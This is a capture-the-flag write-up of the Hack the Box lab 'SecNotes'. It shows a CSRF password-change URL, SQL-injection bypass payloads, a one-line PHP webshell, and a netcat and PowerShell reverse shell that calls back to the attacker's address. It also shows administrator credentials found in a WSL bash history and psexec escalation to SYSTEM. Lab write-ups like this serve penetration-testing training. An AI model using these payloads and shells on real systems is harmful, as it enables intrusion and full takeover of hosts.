Today we are going to solve another CTF challenge “SecNotes” which is available online for those who want to increase their skill in penetration testing and black box testing. SecNotes is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Level: Medium
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.97 so let’s begin with nmap port enumeration.
c:\PENTEST>nmap -sC -sV 10.10.10.97 Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-21 18:18 W. Europe Standard Time Nmap scan report for 10.10.10.97 Host is up (0.022s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 | http-title: Secure Notes - Login |_Requested resource was login.php 445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB) Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h36m34s, deviation: 4h37m08s, median: -3m26s | smb-os-discovery: | OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3) | OS CPE: cpe:/o:microsoft:windows_10::- | Computer name: SECNOTES | NetBIOS computer name: SECNOTES\x00 | Workgroup: HTB\x00 |_ System time: 2019-01-21T09:15:49-08:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-01-21 18:15:51 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 65.69 seconds c:\PENTEST>
Visual inspection of the two IIS instances reveals a custom PHP web application on port 80, and the default IIS welcome page on port 8808
Weak Password Change Mechanism
A common issue with password change mechanisms is a failure to validate that the user knows the existing password. Password recovery mechanisms also allow users to change their password without knowing the existing password, but may require an additional verification step,
such as sending the reset request to the email address associated with the username. If a malicious user gets a victim to click on a malicious password change request, and validation of the existing password is not required, then they may be able to take control of the account.
Cross-Site Request Forgery (CSRF) The "Contact Us" form is directed to tyler, and if a malicious password reset request is sent to this user, they might click the link. CSRF tokens would defend against this attack, but they haven’t been implemented in the web application. In Burp, the "Change Password" request type is changed from POST to GET, and the malicious URL is constructed. http://10.10.10.97/change_pass.php?password=123456&confirm_password=123456 sword&submit=submit The URL is pasted into the message body of the Contact request, and after a short while the credentials tyler:123456 can be used to log into the website. Once logged in, credentials to access a SMB share are found.
.
Second-Order SQL Injection
Access to the SMB credentials can also be gained by bypassing the authentication mechanism.
The website is tested for SQL vulnerabilities. A number of authentication bypass payloads are
selected the from the SecLists Generic-SQLi list.
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Generic-SQLi.txt
‘ or 0=0 —
‘ or 0=0 #
‘ or 0=0 #”
‘ or ‘1’=’1′ —
‘ or 1 –‘
‘ or 1=1 —
‘ or 1=1 or ”=’
‘ or 1=1 or “”=
‘ or a=a —
‘ or a=a
‘) or (‘a’=’a
‘hi’ or ‘x’=’x’;
The login request is sent to the Burp Intruder module (CTRL + I), but this test is not successful.
The register page is tested next, and a payload of ‘ or 1=1– returns the result “This username is already taken”. Other payloads seem to have been accepted and registered as valid user accounts.
We tried inserting SQL injection queries in login form and nothing showed up. Then we tried inserting 2nd order SQL injection which is nothing but inserting SQL injection queries on the sign up form itself hoping that the server side script shows any unusual behavior and reveals some database information.
According to PortSwigger: “Second-order SQL injection arises when user-supplied data is stored by the application and later incorporated into SQL queries in an unsafe way. To detect the vulnerability, it is normally necessary to submit suitable data in one location, and then use some other application function that processes the data in an unsafe way.”
The query that we used was:
Username: ' or 1='1 Password: ' or 1='1 Confirm password: ' or 1='1
It hit successfully and opened up a user account. Seemed like the heading was causing this 2nd order SQLi vulnerability. But it solved our purpose and gave us three notes from the database. The third one had something that seemed like the username and password of a service.
Tyler seems to be a person responsible for people’s queries. After obtaining Tyler’s password the first guess was logging into SMB server running on port 445.
Foothold SMB Share Access
The details are used to access the “new-site” share, which seems to be the IIS webroot
root@kali:~/htb# smbclient //secnotes.htb/new-site -U "tyler" Enter WORKGROUP\tyler's password: 92g!mA8BGjOirkL%OG*& Try "help" to get a list of possible commands. smb: \> ls . D 0 Sun Aug 19 14:06:14 2018 .. D 0 Sun Aug 19 14:06:14 2018 iisstart.htm A 696 Thu Jun 21 11:26:03 2018 iisstart.png A 98757 Thu Jun 21 11:26:03 2018 12978687 blocks of size 4096. 8118293 blocks available
Write access is possible, and a minimal PHP webshell puckie.php with the contents below is uploaded
<?php echo shell_exec($_GET["cmd"]); ?>
viewing user.txt
http://10.10.10.97:8808/puckie.php?cmd=type%20c:\users\tyler\desktop\user.txt 6fa*****4f3
Upgrade Webshell to Reverse Shell
In order to get a proper shell, the “Invoke-PowerShellTcp.ps1” PowerShell script from the Nishang can be used.
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
The following command is used to execute the reverse shell payload.
http://10.10.10.97:8808/puckiestyle.php?cmd=powershell%20-ep%20bypass%20.\puckieshell443.ps1
or with netcat (instead of Nishang)
root@kali:~/htb# curl 10.10.10.97:8808/puckiestyle.php?cmd=nc+-e+cmd.exe+10.10.14.5+9001
root@kali:~/htb# rlwrap nc -lvp 9001 listening on [any] 9001 ... connect to [10.10.14.5] from secnotes.htb [10.10.10.97] 49722 Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. All rights reserved. C:\inetpub\new-site>whoami whoami secnotes\tyler
This is encoded in Burp (CTRL+U), the request is sent and a shell as SECNOTES\tyler is received.
C:\pentest>runas /netonly /user:secnotes.htb\tyler cmd Enter the password for secnotes.htb\tyler:92g!mA8BGjOirkL%OG*& Attempting to start cmd as user "secnotes.htb\tyler" ... C:\pentest> cmd [running as secnotes.htb\tyler) C:\Windows\system32>dir \\10.10.10.97\new-site Volume in drive \\10.10.10.97\new-site has no label. Volume Serial Number is 9CDD-BADA Directory of \\10.10.10.97\new-site 21/01/2019 10:22 <DIR> . 21/01/2019 10:22 <DIR> .. 21/06/2018 16:26 696 iisstart.htm 21/06/2018 16:26 98.757 iisstart.png 2 File(s) 99.453 bytes 2 Dir(s) 33.213.988.864 bytes free c:\PENTEST>copy puckie.php \\10.10.10.97\new-site 1 file(s) copied. c:\PENTEST>copy puckieshell443.ps1 \\10.10.10.97\new-site 1 file(s) copied. c:\PENTEST>dir \\10.10.10.97\new-site Volume in drive \\10.10.10.97\new-site has no label. Volume Serial Number is 9CDD-BADA Directory of \\10.10.10.97\new-site 21/01/2019 16:02 <DIR> . 21/01/2019 16:02 <DIR> .. 21/06/2018 16:26 696 iisstart.htm 21/06/2018 16:26 98.757 iisstart.png 21/01/2019 10:19 44 puckie.php 21/01/2019 14:05 4.401 puckieshell443.ps1 4 File(s) 99.497 bytes 2 Dir(s) 33.213.988.864 bytes free c:\PENTEST>
netcat listener
C:\Users\jacco>nc -lvp 443 listening on [any] 443 ... 10.10.10.97: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.10.14.12] from (UNKNOWN) [10.10.10.97] 49791: NO_DATA ls Windows PowerShell running as user SECNOTES$ on SECNOTES Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\inetpub\new-site> Directory: C:\inetpub\new-site Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 6/21/2018 8:26 AM 696 iisstart.htm -a---- 6/21/2018 8:26 AM 98757 iisstart.png -a---- 1/21/2019 1:19 AM 44 puckie.php -a---- 1/21/2019 5:05 AM 4401 puckieshell443.ps1
Privilege Escalation
Discovery of Administrator Password
Enumeration of the C:\ reveals the file “Ubuntu.zip” and a “Distros\Ubuntu” folder. Potentially
Windows Subsystem for Linux (WSL) has been installed?
In order to check if WSL has been installed, the following command is issued.
PS C:\> Get-ChildItem HKCU:\Software\Microsoft\Windows\CurrentVersion\Lxss Hive: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Lxss Name Property ---- -------- {02893575-609c-4e3b-a426-00f9d State : 1 9b271da} DistributionName : Ubuntu-18.04 Version : 1 BasePath : C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18 .04onWindows_79rhkp1fndgsc\LocalState PackageFamilyName : CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc
This confirms that WSL has been installed, and the Linux filesystem has been installed to the path as shown above
The Linux filesystem is enumerated. The “.bash_history” file is checked, and administrative credentials are discovered.
PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs> cd root PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root> ls Directory: C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalStat e\rootfs\root Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 6/22/2018 2:56 AM filesystem -a---- 6/22/2018 3:09 AM 3112 .bashrc -a---- 6/22/2018 2:41 PM 398 .bash_history -a---- 6/21/2018 6:00 PM 148 .profile PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root> > cat .bash_history cd /mnt/c/ ls cd Users/ cd / cd ~ ls pwd mkdir filesystem mount //127.0.0.1/c$ filesystem/ sudo apt install cifs-utils mount //127.0.0.1/c$ filesystem/ mount //127.0.0.1/c$ filesystem/ -o user=administrator cat /proc/filesystems sudo modprobe cifs smbclient apt install smbclient smbclient smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$ > .bash_history less .bash_history exit PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root>
The same enumeration can also be carried out using bash.
bash -c "whoami;hostname" bash -c "ls -al /root" bash -c "cat /root/.bash_history"
A SYSTEM shell can be gained using psexec
C:\Users\jacco>psexec.exe \\10.10.10.97 -u SECNOTES\Administrator cmd.exe PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com Password:u6!4ZwgwOM#^OBf#Nwnh Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>whoami secnotes\administrator
root@kali:~/htb# psexec.py Administrator@10.10.10.97 Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation Password: u6!4ZwgwOM#^OBf#Nwnh [*] Requesting shares on 10.10.10.97..... [*] Found writable share ADMIN$ [*] Uploading file FtHMilUj.exe [*] Opening SVCManager on 10.10.10.97..... [*] Creating service gSOW on 10.10.10.97..... [*] Starting service gSOW..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>whoami nt authority\system
Author: Puckiestyle